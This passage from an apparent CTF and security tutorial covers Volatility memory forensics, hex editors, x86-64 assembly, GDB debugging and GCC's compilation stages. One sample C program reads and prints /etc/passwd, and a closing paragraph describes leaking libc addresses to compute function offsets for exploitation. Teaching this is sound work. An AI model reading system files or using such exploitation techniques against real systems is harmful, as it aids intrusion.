          Number of Processors : 1
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff80002804d00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2012-02-22 11:29:02 UTC+0000
     Image local date and time : 2012-02-22 03:29:02 -0800

Dump Processes

To view processes, the pslist, pstree, or psscan command can be used.

$ python vol.py -f ~/image.raw --profile=Win7SP0x64 pslist
Volatility Foundation Volatility Framework 2.5
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xffffa0ee12532180 System                    4      0    108        0 ------      0 2018-04-22 20:02:33 UTC+0000
0xffffa0ee1389d040 smss.exe                232      4      3        0 ------      0 2018-04-22 20:02:33 UTC+0000
...
0xffffa0ee128c6780 VBoxTray.exe           3324   1123     10        0      1      0 2018-04-22 20:02:55 UTC+0000
0xffffa0ee14108780 OneDrive.exe           1422   1123     10        0      1      1 2018-04-22 20:02:55 UTC+0000
0xffffa0ee14ade080 svchost.exe             228    121      1        0      1      0 2018-04-22 20:14:43 UTC+0000
0xffffa0ee1122b080 notepad.exe            2019   1123      1        0      1      0 2018-04-22 20:14:49 UTC+0000

Process Memory Dump

Dumping the memory of a process can prove to be fruitful. Say we want to dump the data from notepad.exe:

$ python vol.py -f ~/image.raw --profile=Win7SP0x64 memdump -p 2019 -D dump/
Volatility Foundation Volatility Framework 2.4
************************************************************************
Writing notepad.exe [  2019] to 2019.dmp

$ ls -alh dump/2019.dmp
-rw-r--r--  1 user  staff   111M Apr 22 20:47 dump/2019.dmp

Other Useful Commands

There are plenty of commands that Volatility offers but some highlights include:

$ python vol.py -f IMAGE --profile=PROFILE connections: view network connections
$ python vol.py -f IMAGE --profile=PROFILE cmdscan: view commands that were run in cmd prompt

Hex Editor

A hexadecimal (hex) editor (also called a binary file editor or byte editor) is a computer program you can use to manipulate the fundamental binary data that constitutes a computer file. The name “hex” comes from “hexadecimal,” a standard numerical format for representing binary data. A typical computer file occupies multiple areas on the platter(s) of a disk drive, whose contents are combined to form the file. Hex editors that are designed to parse and edit sector data from the physical segments of floppy or hard disks are sometimes called sector editors or disk editors. A hex editor is used to see or edit the raw, exact contents of a file. Hex editors may be used to correct data corrupted by a system or application. A list of editors can be found on the forensics Wiki. You can download one and install it on your system.

Example

Open fileA.jpg in a hex editor. (Most Hex editors have either a “File > Open” option or a simple drag and drop.)

fileA

When you open fileA.jpg in your hex editor, you should see something similar to this:

Hexadecimal Editor Screenshot

Your hex editor should also have a “go to” or “find” feature so you can jump to a specific byte.
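If no hex editor is installed, a read-only view in the same layout (offset, hex bytes, ASCII) can be produced with a few lines of Python. The function name `hexdump` is chosen for this sketch, and the sample bytes are the JPEG header discussed in the File Signatures section.

```python
def hexdump(data, width=16):
    """Format bytes as offset, hex columns, and printable ASCII."""
    lines = []
    for offset in range(0, len(data), width):
        chunk = data[offset:offset + width]
        hex_part = " ".join(f"{b:02x}" for b in chunk)
        # Non-printable bytes are shown as dots, as most hex editors do.
        ascii_part = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{offset:08x}  {hex_part.ljust(width * 3)} {ascii_part}")
    return "\n".join(lines)

print(hexdump(bytes.fromhex("ffd8ffe000104a46494600")))
```

To inspect a file, pass it the result of `open(path, "rb").read(256)` or a similar slice.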

Reverse Engineering

https://ctf101.org/reverse-engineering/overview/

Reverse Engineering in a CTF is typically the process of taking a compiled (machine code, bytecode) program and converting it back into a more human-readable format.

Very often the goal of a reverse engineering challenge is to understand the functionality of a given program such that you can identify deeper issues.

Assembly / Machine Code
The C Programming Language
Disassemblers
Decompilers

Assembly/Machine Code

Machine code is code that has been encoded for direct execution by a CPU; assembly is its human-readable, mnemonic form. Compiling to machine code discards most source-level information, which is why programs written in readable languages like C cannot simply be reversed into their original source once compiled (decompilers can approximate it, but more on that later).

From Source to Compilation

Godbolt shows the differences in machine code generated by various compilers.

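For example, if we have a simple C program:

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

int main() {
    char c;
    // syscall 2 is open() on x86-64 Linux; flags 0 means O_RDONLY
    int fd = syscall(2, "/etc/passwd", 0);
    // syscall 0 is read(); it returns 0 at end of file
    while (syscall(0, fd, &c, 1)) {
        putchar(c);
    }
}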

We can see the compilation results in some verbose instructions for the CPU:

.LC0:
  .string "/etc/passwd"
main:
  push rbp
  mov rbp, rsp
  sub rsp, 16
  mov edx, 0
  mov esi, OFFSET FLAT:.LC0
  mov edi, 2
  mov eax, 0
  call syscall
  mov DWORD PTR [rbp-4], eax
.L3:
  lea rdx, [rbp-5]
  mov eax, DWORD PTR [rbp-4]
  mov ecx, 1
  mov esi, eax
  mov edi, 0
  mov eax, 0
  call syscall
  test rax, rax
  setne al
  test al, al
  je .L2
  movzx eax, BYTE PTR [rbp-5]
  movsx eax, al
  mov edi, eax
  call putchar
  jmp .L3
.L2:
  mov eax, 0
  leave
  ret

This is a one-way process for compiled languages as there is no way to generate sources from machine code. While the machine code may seem unintelligible, the extremely basic functions can be interpreted with some practice.

x86-64

x86-64 (also called amd64, x64, or Intel 64) is a 64-bit Complex Instruction Set Computing (CISC) architecture. It extends Intel's 32-bit x86 architecture, widening the general-purpose registers from 32 to 64 bits. CISC means that a single instruction can do several things at once, such as memory accesses and register reads. It is also a variable-length instruction set, which means instructions can be of different sizes, ranging from 1 to 15 bytes long. Finally, x86-64 allows multi-sized register access, which means that you can access parts of a register at different sizes.

x86-64 Registers

x86-64 registers behave similarly to those of other architectures. A key feature of x86-64 registers is multi-sized access: the lower 32 bits of the register RAX can be accessed as EAX, the lower 16 bits as AX, and the lowest 8 bits as AL. This lets code pick the operand size that suits the data it is handling.
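As a rough illustration of multi-sized access, the sketch below models RAX as a plain 64-bit integer and derives the narrower views by masking. The helper name sub_registers and the sample value are made up for this example; a real CPU exposes these views in hardware.

```python
def sub_registers(rax: int) -> dict:
    """Return the RAX/EAX/AX/AL views of one 64-bit value."""
    rax &= 0xFFFFFFFFFFFFFFFF        # keep only 64 bits
    return {
        "rax": rax,
        "eax": rax & 0xFFFFFFFF,     # low 32 bits
        "ax": rax & 0xFFFF,          # low 16 bits
        "al": rax & 0xFF,            # low 8 bits
    }

views = sub_registers(0x1122334455667788)
for name, value in views.items():
    print(f"{name} = {value:#x}")
```

Every view reads the same underlying bits, which is why writing to AL also changes what RAX holds.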

x86-64 has plenty of registers, including rax, rbx, rcx, rdx, rdi, rsi, rsp, rip, r8-r15, and more! But some registers serve special purposes.

The special registers include:

- RIP: the instruction pointer
- RSP: the stack pointer
- RBP: the base pointer

Instructions

An instruction represents a single operation for the CPU to perform.

There are different types of instructions including:

Data movement: mov rax, [rsp - 0x40]
Arithmetic: add rbx, rcx
Control-flow: jne 0x8000400

Because x86-64 is a CISC architecture, a single instruction can be quite complex. For example, repne scasb scans memory starting at the address in RDI (EDI in 32-bit code) for the byte in AL, repeating up to RCX (ECX) times and decrementing the counter for each byte scanned. With AL set to 0x00 it finds a NULL terminator, which is essentially strlen() in a single instruction!
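To make the behaviour of repne scasb more concrete, here is a small Python model of it. It is only a sketch: memory is a bytes object, the registers are ordinary integers, the direction flag is assumed to be clear (forward scan), and the function name is invented for this example.

```python
def repne_scasb(memory: bytes, rdi: int, rcx: int, al: int = 0):
    """Scan memory from rdi for the byte al, at most rcx times.

    Returns the updated (rdi, rcx) pair, like the real instruction
    leaves them in the registers.
    """
    while rcx != 0:
        byte = memory[rdi]
        rdi += 1           # scasb advances the pointer
        rcx -= 1           # rep decrements the counter
        if byte == al:     # a match sets ZF, which stops "repne"
            break
    return rdi, rcx

memory = b"flag\x00junk"
start_rcx = 0xFFFFFFFF
rdi, rcx = repne_scasb(memory, 0, start_rcx)
length = start_rcx - rcx - 1   # bytes scanned, minus the terminator
print(length)
```

The string length falls out of how far the counter moved, which is the classic strlen idiom built on this instruction.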

It is important to remember that an instruction really is just memory. This idea will become useful with Return Oriented Programming (ROP).

Instructions, numbers, strings, everything! Always represented in hex.

add rax, rbx == 48 01 d8
mov rax, 0xdeadbeef == 48 c7 c0 ef be ad de
mov rax, [0xdeadbeef] == 67 48 8b 05 ef be ad de
"Hello" == 48 65 6c 6c 6f
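The trailing ef be ad de in the encodings above is simply 0xdeadbeef stored in little-endian byte order, and the "Hello" bytes are its ASCII codes. A short Python check, using only the standard struct module, reproduces both; it does not assemble instructions, it only shows how the data part is laid out.

```python
import struct

# 32-bit immediate, least significant byte first (little-endian)
immediate = struct.pack("<I", 0xdeadbeef)
hello = "Hello".encode("ascii")

print(immediate.hex(" "))
print(hello.hex(" "))
```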

Execution

What should the CPU execute? This is determined by the RIP register where IP means instruction pointer. Execution follows the pattern: fetch the instruction at the address in RIP, decode it, and run it.

Examples

mov rax, 0xdeadbeef

Here the operation mov is moving the "immediate" 0xdeadbeef into the register RAX

mov rax, [0xdeadbeef + rbx * 4]

Here the operation mov is moving the data at the address of [0xdeadbeef + RBX*4] into the register RAX. When brackets are used, you can think of the program as getting the content from that effective address.
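The bracketed form can be sketched in Python as "compute an address, then read from it". The toy memory, the displacement 0x10, and the helper name load_qword below are assumptions made for illustration; only the address arithmetic mirrors the instruction.

```python
import struct

def load_qword(memory: bytes, disp: int, index: int, scale: int) -> int:
    """Model `mov rax, [disp + index*scale]`."""
    address = disp + index * scale                        # effective address
    (value,) = struct.unpack_from("<Q", memory, address)  # 8 bytes, little-endian
    return value

memory = bytes(range(64))      # toy memory: byte i holds the value i
rbx = 2
rax = load_qword(memory, 0x10, rbx, 4)
print(hex(rax))
```

Here the effective address is 0x10 + 2*4 = 0x18, so the eight bytes 0x18 through 0x1f are loaded, with the lowest address ending up in the least significant byte.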

Example Execution

-> 0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x0804000
   0x080400a: add rax, rbx                   RAX = 0x0
   0x080400d: inc rbx                        RBX = 0x0
   0x0804010: sub rax, rbx                   RCX = 0x0
   0x0804013: mov rcx, rax                   RDX = 0x0

   0x0804000: mov eax, 0xdeadbeef            Register Values:
-> 0x0804005: mov ebx, 0x1234                RIP = 0x0804005
   0x080400a: add rax, rbx                   RAX = 0xdeadbeef
   0x080400d: inc rbx                        RBX = 0x0
   0x0804010: sub rax, rbx                   RCX = 0x0
   0x0804013: mov rcx, rax                   RDX = 0x0

   0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x080400a
-> 0x080400a: add rax, rbx                   RAX = 0xdeadbeef
   0x080400d: inc rbx                        RBX = 0x1234
   0x0804010: sub rax, rbx                   RCX = 0x0
   0x0804013: mov rcx, rax                   RDX = 0x0

   0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x080400d
   0x080400a: add rax, rbx                   RAX = 0xdeadd123
-> 0x080400d: inc rbx                        RBX = 0x1234
   0x0804010: sub rax, rbx                   RCX = 0x0
   0x0804013: mov rcx, rax                   RDX = 0x0

   0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x0804010
   0x080400a: add rax, rbx                   RAX = 0xdeadd123
   0x080400d: inc rbx                        RBX = 0x1235
-> 0x0804010: sub rax, rbx                   RCX = 0x0
   0x0804013: mov rcx, rax                   RDX = 0x0

   0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x0804013
   0x080400a: add rax, rbx                   RAX = 0xdeadbeee
   0x080400d: inc rbx                        RBX = 0x1235
   0x0804010: sub rax, rbx                   RCX = 0x0
-> 0x0804013: mov rcx, rax                   RDX = 0x0

   0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x0804016
   0x080400a: add rax, rbx                   RAX = 0xdeadbeee
   0x080400d: inc rbx                        RBX = 0x1235
   0x0804010: sub rax, rbx                   RCX = 0xdeadbeee
   0x0804013: mov rcx, rax                   RDX = 0x0
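The register values in this walkthrough can be double-checked with a tiny interpreter. The sketch below is not an emulator: it supports only the four operations used here, treats every register as 64 bits wide, and its tuple-based program format is invented for the example.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF
regs = {"rax": 0, "rbx": 0, "rcx": 0, "rdx": 0}

program = [
    ("mov", "rax", 0xdeadbeef),   # mov eax, 0xdeadbeef (upper half becomes 0)
    ("mov", "rbx", 0x1234),       # mov ebx, 0x1234
    ("add", "rax", "rbx"),
    ("inc", "rbx", None),
    ("sub", "rax", "rbx"),
    ("mov", "rcx", "rax"),
]

def value_of(operand):
    """Registers are named by strings, immediates are plain ints."""
    return regs[operand] if isinstance(operand, str) else operand

for op, dst, src in program:
    if op == "mov":
        regs[dst] = value_of(src)
    elif op == "add":
        regs[dst] = (regs[dst] + value_of(src)) & MASK64
    elif op == "sub":
        regs[dst] = (regs[dst] - value_of(src)) & MASK64
    elif op == "inc":
        regs[dst] = (regs[dst] + 1) & MASK64
    print(op, {name: hex(value) for name, value in regs.items()})
```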

Control Flow

How can we express conditionals in x86-64? We use conditional jumps such as:

jnz <address>
je <address>
jge <address>
jle <address>
etc.

They jump if their condition is true and fall through to the next instruction otherwise. The conditions are evaluated from EFLAGS (RFLAGS in 64-bit mode), a special register whose flag bits are set by certain instructions. For example, add rax, rbx sets the overflow flag (OF) if the signed sum does not fit in a 64-bit register and wraps around; you can jump based on that with a jo instruction. The most important instruction to remember is cmp:

cmp rax, rbx
jle error

This assembly jumps to error if RAX <= RBX (compared as signed values).
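Under the hood, cmp subtracts its second operand from the first, discards the result, and keeps only the flags; jle is then taken when ZF is set or SF differs from OF. The following Python sketch models just those three flags for 64-bit operands. The function names are made up for this example.

```python
MASK64 = (1 << 64) - 1

def to_signed(value: int) -> int:
    """Interpret a 64-bit pattern as a signed integer."""
    value &= MASK64
    return value - (1 << 64) if value >> 63 else value

def cmp_flags(a: int, b: int) -> dict:
    """Flags after `cmp a, b`, which computes a - b and discards it."""
    result = (a - b) & MASK64
    signed_result = to_signed(a) - to_signed(b)
    return {
        "ZF": result == 0,
        "SF": bool(result >> 63),
        "OF": not (-(1 << 63) <= signed_result < (1 << 63)),
    }

def jle_taken(flags: dict) -> bool:
    return flags["ZF"] or flags["SF"] != flags["OF"]

print(jle_taken(cmp_flags(3, 5)))        # 3 <= 5
print(jle_taken(cmp_flags(5, 3)))        # 5 <= 3
print(jle_taken(cmp_flags(MASK64, 1)))   # 0xffff...ffff is -1 when signed
```

The last call shows why the signed interpretation matters: the bit pattern of all ones is treated as -1, so the jump is taken.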

Addresses

Memory acts similarly to a big array where the indices of this "array" are memory addresses. Remember from earlier:

mov rax, [0xdeadbeef]

The square brackets mean "get the data at this address". This is analogous to the C/C++ syntax: rax = *(uint64_t *)0xdeadbeef;

Disassemblers

A disassembler is a tool that translates the machine code of a compiled program back into assembly.

List of Disassemblers

IDA
Binary Ninja
GNU Debugger (GDB)
radare2
Hopper

IDA

The Interactive Disassembler (IDA) is the industry standard for binary disassembly. IDA is capable of disassembling "virtually any popular file format". This makes it very useful to security researchers and CTF players who often need to analyze obscure files without knowing what they are or where they came from. IDA also features the industry-leading Hex-Rays decompiler which can convert assembly code back into a pseudo code-like format.

IDA also has a plugin interface which has been used to create some successful plugins that can make reverse engineering easier:

https://github.com/google/binnavi
https://github.com/yegord/snowman
https://github.com/gaasedelen/lighthouse
https://github.com/joxeankoret/diaphora
https://github.com/REhints/HexRaysCodeXplorer
https://github.com/osirislab/Fentanyl

Binary Ninja

Binary Ninja is an up-and-coming disassembler that attempts to bring a new, more programmatic approach to reverse engineering. Binary Ninja brings an improved plugin API and modern features to reverse engineering. While it is neither as popular nor as old as IDA, Binary Ninja (often called binja) is quickly gaining ground and has a small community of dedicated users and followers.

Binja also has some community-contributed plugins which are collected here: https://github.com/Vector35/community-plugins

gdb

The GNU Debugger is a free and open-source debugger that also disassembles programs. It's capable as a disassembler, but most notably it is used by CTF players for its debugging and dynamic analysis capabilities.

gdb is often used in tandem with enhancement scripts like peda, pwndbg, and GEF

The GNU Debugger (GDB)

The GNU Debugger or GDB is a powerful debugger that allows for the step-by-step execution of a program. It can be used to trace program execution and is an important part of any reverse engineering toolkit.

Vanilla GDB

GDB without any modifications is unintuitive and obscures a lot of useful information. The pwndbg plug-in solves many of these problems and makes for a much more pleasant experience. But if you are constrained to vanilla gdb, here are several things to make your life easier.

Starting GDB

To start GDB and load a program, simply run gdb [program]

Disassembly

(gdb) disassemble [address/symbol] will display the disassembly for that function/frame

GDB accepts unambiguous abbreviations of its commands, so (gdb) disas main suffices if you'd like to see the disassembly of main

View Disassembly During Execution

Another handy thing to see while stepping through a program is the disassembly of nearby instructions:

(gdb) display/[# of instructions]i $pc [± offset]

display shows data with each step
/[#]i shows how much data in the format i for instruction
$pc means the pc, program counter, register
[± offset] allows you to specify how you would like the data offset from the current instruction

Example Usage

(gdb) display/10i $pc - 0x5

This command shows 10 instructions on screen, starting 5 bytes before the next instruction to execute, giving us this display:

   0x8048535 <main+6>:  lock pushl -0x4(%ecx)
   0x8048539 <main+10>: push   %ebp
=> 0x804853a <main+11>: mov    %esp,%ebp
   0x804853c <main+13>: push   %ecx
   0x804853d <main+14>: sub    $0x14,%esp
   0x8048540 <main+17>: sub    $0xc,%esp
   0x8048543 <main+20>: push   $0x400
   0x8048548 <main+25>: call   0x80483a0 <malloc@plt>
   0x804854d <main+30>: add    $0x10,%esp
   0x8048550 <main+33>: sub    $0xc,%esp

Deleting Views

If, for whatever reason, a view no longer suits your needs, simply call (gdb) info display, which will give you a list of active displays:

Auto-display expressions now in effect:
Num Enb Expression
1:   y  /10bi $pc-0x5

Then simply execute (gdb) delete display 1 and your execution will resume without the display.

Registers

In order to view the state of registers with vanilla gdb, you need to run the command info registers which will display the state of all the registers:

eax            0xf77a6ddc   -142971428
ecx            0xffe06b10   -2069744
edx            0xffe06b34   -2069708
ebx            0x0  0
esp            0xffe06af8   0xffe06af8
ebp            0x0  0x0
esi            0xf77a5000   -142979072
edi            0xf77a5000   -142979072
eip            0x804853a    0x804853a <main+11>
eflags         0x286    [ PF SF IF ]
cs             0x23 35
ss             0x2b 43
ds             0x2b 43
es             0x2b 43
fs             0x0  0
gs             0x63 99

If you would simply like to see the contents of a single register, use the notation p/x $[register], where:

p/x means to print the value in hex notation
$[register] is the register name such as eax, rax, etc.

Note that x/x $[register] instead examines the memory at the address held in the register.

Pwndbg

These commands work with vanilla gdb as well.

Setting Breakpoints

Setting breakpoints in GDB uses the format b*[Address/Symbol]

Example Usage

(gdb) b*main: Break at the start
(gdb) b*0x804854d: Break at 0x804854d
(gdb) b*0x804854d-0x100: Break at 0x804844d

Deleting Breakpoints

As before, in order to delete a breakpoint, you can list the available breakpoints using (gdb) info breakpoints (don't forget that GDB accepts abbreviated commands, so you don't always need to type out every command!), which will display all breakpoints:

Num     Type           Disp Enb Address    What
1       breakpoint     keep y   0x0804852f <main>
3       breakpoint     keep y   0x0804864d <__libc_csu_init+61>

Then simply execute (gdb) delete 1

Note

GDB creates breakpoints chronologically and does NOT reuse numbers.

Stepping

What good is a debugger if you can't control where you are going? To begin the execution of a program, use the command r [arguments], just as you would run ./program [arguments] from the shell. If no breakpoints are set, the program runs normally to completion; if breakpoints are set, execution stops when one of them is hit.

(gdb) continue [N]: Resumes the execution of the program until it finishes or until another breakpoint is hit; with N, the breakpoint you are stopped at is ignored until the Nth time it is reached (shorthand c)
(gdb) stepi [# of instructions]: Executes the specified number of machine instructions, stepping into calls; default is 1 (shorthand si). The source-line equivalent is step (shorthand s)
(gdb) nexti [# of instructions]: Steps over an instruction, meaning it will not delve into called functions (shorthand ni)
(gdb) finish: Runs until the current function returns and breaks right after (shorthand fin)

Examining

Examining data in GDB is also very useful for seeing how the program is affecting data. The notation may seem complex at first, but it is flexible and provides powerful functionality.

(gdb) x/[#][size][format] [Address/Symbol/Register][± offset]

x/ means examine
[#] means how many units to display
[size] means what size each unit should be: byte b (1 byte), halfword h (2 bytes), word w (4 bytes), or giant word g (8 bytes)
[format] means how the data should be interpreted such as an instruction i, a string s, hex bytes x
[Address/Symbol/Register][± offset] means where to start interpreting the data

Example Usage

(gdb) x/x $rax: Displays the memory at the address held in RAX as hex
(gdb) x/i 0xdeadbeef: Displays the instruction at address 0xdeadbeef
(gdb) x/10s 0x893e10: Displays 10 strings at the address
(gdb) x/10gx 0x7fe10: Displays 10 giant words as hex at the address

Forking

If the program happens to be an accept-and-fork server, gdb will have issues following the child or parent processes. To specify which process gdb should follow after a fork, use the command set follow-fork-mode [parent/child]

Setting Data

If you would like to set data at any point, it is possible using the command set [Register]=[Value] for registers, or set {type}[Address]=[Value] for memory

Example Usage

set $rax=0x0: Sets the register rax to 0
set {int}0x1e4a70=0x123: Sets the 4-byte value at 0x1e4a70 to 0x123

Process Mapping

A handy way to find the process's mapped address spaces is to use info proc map:

Mapped address spaces:

    Start Addr   End Addr       Size     Offset objfile
     0x8048000  0x8049000     0x1000        0x0 /directory/program
     0x8049000  0x804a000     0x1000        0x0 /directory/program
     0x804a000  0x804b000     0x1000     0x1000 /directory/program
    0xf75cb000 0xf75cc000     0x1000        0x0
    0xf75cc000 0xf7779000   0x1ad000        0x0 /lib32/libc-2.23.so
    0xf7779000 0xf777b000     0x2000   0x1ac000 /lib32/libc-2.23.so
    0xf777b000 0xf777c000     0x1000   0x1ae000 /lib32/libc-2.23.so
    0xf777c000 0xf7780000     0x4000        0x0
    0xf778b000 0xf778d000     0x2000        0x0 [vvar]
    0xf778d000 0xf778f000     0x2000        0x0 [vdso]
    0xf778f000 0xf77b1000    0x22000        0x0 /lib32/ld-2.23.so
    0xf77b1000 0xf77b2000     0x1000        0x0
    0xf77b2000 0xf77b3000     0x1000    0x22000 /lib32/ld-2.23.so
    0xf77b3000 0xf77b4000     0x1000    0x23000 /lib32/ld-2.23.so
    0xffc59000 0xffc7a000    0x21000        0x0 [stack]

This will show you where the stack, heap (if there is one), and libc are located.

Attaching Processes

Another useful feature of GDB is attaching to processes that are already running. Simply launch gdb, find the process id of the program you would like to attach to, and execute attach [pid].

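Reverse Engineering and Assembly Language

C Language Basics

From Source Code to Executable

Using "Hello World", the first program in the classic book "The C Programming Language", as an example, we walk through how GCC compiles a program on Linux.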

#include <stdio.h>
main()
{
    printf("hello, world\n");
}
$ gcc hello.c
$ ./a.out
hello, world

The process above can be divided into four steps: preprocessing, compilation, assembly, and linking.

Preprocessing

gcc -E hello.c -o hello.i
# 1 "hello.c"
# 1 "<built-in>"
# 1 "<command-line>"
......
extern int printf (const char *__restrict __format, ...);
......
main() {
 printf("hello, world\n");
}

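Preprocessing mainly handles the directives in the source code that begin with "#":

Remove every "#define" and expand all macro definitions.
Process all conditional directives, such as "#if", "#ifdef", "#elif", "#else", and "#endif".
Process "#include" directives by inserting the included file at the position of the directive. Note that this is done recursively.
Remove all comments.
Add line numbers and file name markers.
Keep all #pragma compiler directives.

Compilation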

gcc -S hello.c -o hello.s
        .file   "hello.c"
        .section        .rodata
.LC0:
        .string "hello, world"
        .text
        .globl  main
        .type   main, @function
main:
.LFB0:
        .cfi_startproc
        pushq   %rbp
        .cfi_def_cfa_offset 16
        .cfi_offset 6, -16
        movq    %rsp, %rbp
        .cfi_def_cfa_register 6
        leaq    .LC0(%rip), %rdi
        call    puts@PLT
        movl    $0, %eax
        popq    %rbp
        .cfi_def_cfa 7, 8
        ret
        .cfi_endproc
.LFE0:
        .size   main, .-main
        .ident  "GCC: (GNU) 7.2.0"
        .section        .note.GNU-stack,"",@progbits

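Compilation takes the preprocessed file through lexical analysis, syntax analysis, semantic analysis, and optimization, and produces the corresponding assembly code file.

Assembly

$ gcc -c hello.s -o hello.o
or
$ gcc -c hello.c -o hello.o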
$ objdump -sd hello.o

hello.o:     file format elf64-x86-64

Contents of section .text:
 0000 554889e5 488d3d00 000000e8 00000000  UH..H.=.........
 0010 b8000000 005dc3                      .....].
Contents of section .rodata:
 0000 68656c6c 6f2c2077 6f726c64 00        hello, world.
Contents of section .comment:
 0000 00474343 3a202847 4e552920 372e322e  .GCC: (GNU) 7.2.
 0010 3000                                 0.
Contents of section .eh_frame:
 0000 14000000 00000000 017a5200 01781001  .........zR..x..
 0010 1b0c0708 90010000 1c000000 1c000000  ................
 0020 00000000 17000000 00410e10 8602430d  .........A....C.
 0030 06520c07 08000000                    .R......

Disassembly of section .text:

0000000000000000 <main>:
   0:   55                      push   %rbp
   1:   48 89 e5                mov    %rsp,%rbp
   4:   48 8d 3d 00 00 00 00    lea    0x0(%rip),%rdi        # b <main+0xb>
   b:   e8 00 00 00 00          callq  10 <main+0x10>
  10:   b8 00 00 00 00          mov    $0x0,%eax
  15:   5d                      pop    %rbp
  16:   c3                      retq

The assembler turns the assembly code into instructions the machine can execute.

Linking

gcc hello.o -o hello
$ objdump -d -j .text hello
......
000000000000064a <main>:
 64a:   55                      push   %rbp
 64b:   48 89 e5                mov    %rsp,%rbp
 64e:   48 8d 3d 9f 00 00 00    lea    0x9f(%rip),%rdi        # 6f4 <_IO_stdin_used+0x4>
 655:   e8 d6 fe ff ff          callq  530 <puts@plt>
 65a:   b8 00 00 00 00          mov    $0x0,%eax
 65f:   5d                      pop    %rbp
 660:   c3                      retq
 661:   66 2e 0f 1f 84 00 00    nopw   %cs:0x0(%rax,%rax,1)
 668:   00 00 00
 66b:   0f 1f 44 00 00          nopl   0x0(%rax,%rax,1)
......

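An object file has to be linked with a whole set of other files to produce the final executable (only the linked main function is shown above; compare it with the main function in hello.o). Linking mainly consists of address and storage allocation, symbol resolution, and relocation.

gcc Tips

Normally, compilation leaves only the executable behind, and the intermediate .i, .s, and .o files are not kept. The -save-temps option keeps these intermediate files permanently.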

$ gcc -save-temps hello.c
$ ls
a.out hello.c  hello.i  hello.o  hello.s

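Note that gcc links dynamically by default. The a.out produced here is in fact reported as a shared object, which is how file describes a position-independent executable (PIE).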

$ file a.out
a.out: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=533aa4ca46d513b1276d14657ec41298cafd98b1, not stripped

The --verbose option prints gcc's detailed workflow.

gcc hello.c -static --verbose

There is a lot of output; we mainly care about the following lines:

$ /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/cc1 -quiet -v hello.c -quiet -dumpbase hello.c -mtune=generic -march=x86-64 -auxbase hello -version -o /tmp/ccj1jUMo.s

as -v --64 -o /tmp/ccAmXrfa.o /tmp/ccj1jUMo.s

/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/collect2 -plugin /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/liblto_plugin.so -plugin-opt=/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/lto-wrapper -plugin-opt=-fresolution=/tmp/cc1l5oJV.res -plugin-opt=-pass-through=-lgcc -plugin-opt=-pass-through=-lgcc_eh -plugin-opt=-pass-through=-lc --build-id --hash-style=gnu -m elf_x86_64 -static /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../../../lib/crt1.o /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../../../lib/crti.o /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/crtbeginT.o -L/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0 -L/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../../../lib -L/lib/../lib -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../.. /tmp/ccAmXrfa.o --start-group -lgcc -lgcc_eh -lc --end-group /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/crtend.o /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../../../lib/crtn.o

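The three commands are cc1, as, and collect2. cc1 is gcc's compiler proper, which compiles the .c file into a .s file; as is the assembler, which assembles the .s file into a .o file; collect2 is the linker command, a wrapper around ld. When linking statically, gcc links five important object files of the C runtime (crt1.o, crti.o, crtbeginT.o, crtend.o, and crtn.o) and the three static libraries named by -lgcc, -lgcc_eh, and -lc into the executable.

ELF files are covered in more detail in section 1.5.3.

The C Standard Library

The C runtime library (CRT) is a large body of code that supports the normal execution of programs. The C standard library makes up the most important part of it.

Commonly used standard library headers:

Standard input/output (stdio.h)
Character handling (ctype.h)
String handling (string.h)
Math functions (math.h)
General utilities (stdlib.h)
Time and date (time.h)
Assertions (assert.h)
Limits of the various types (limits.h & float.h)
Variable arguments (stdarg.h)
Non-local jumps (setjmp.h)

glibc, the GNU C Library, is a C standard library developed for the GNU operating system. It consists of two main parts: the header files, located in /usr/include, and the library binaries. The binaries are mainly the C standard library, in a dynamic and a static version; the dynamic version is located at /lib/libc.so.6 and the static version at /usr/lib/libc.a.

During exploitation, we usually obtain the virtual address of a target function by computing its offset from a known function's address within the same libc. For this, the local libc version must match the remote one. We can leak the addresses of a few functions first and then search libcdb.com to identify the version.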
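The offset arithmetic described here can be sketched in a few lines of Python. All numbers below are invented for illustration: real offsets depend on the exact libc build, and the leaked address would come from the target process. The names LIBC_OFFSETS and resolve are likewise hypothetical.

```python
# Hypothetical symbol offsets inside one particular libc build.
LIBC_OFFSETS = {"puts": 0x6F690, "system": 0x45390}

def resolve(leaked_name: str, leaked_addr: int, target_name: str) -> int:
    """Derive a target function's address from one leaked address."""
    libc_base = leaked_addr - LIBC_OFFSETS[leaked_name]
    return libc_base + LIBC_OFFSETS[target_name]

leaked_puts = 0x7F3A1C26F690              # made-up leaked address of puts
system_addr = resolve("puts", leaked_puts, "system")
print(hex(system_addr))
```

Because both functions live in the same mapped library, the difference between their addresses is constant, which is why a single leak is enough once the libc version is known.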

Integer Representation

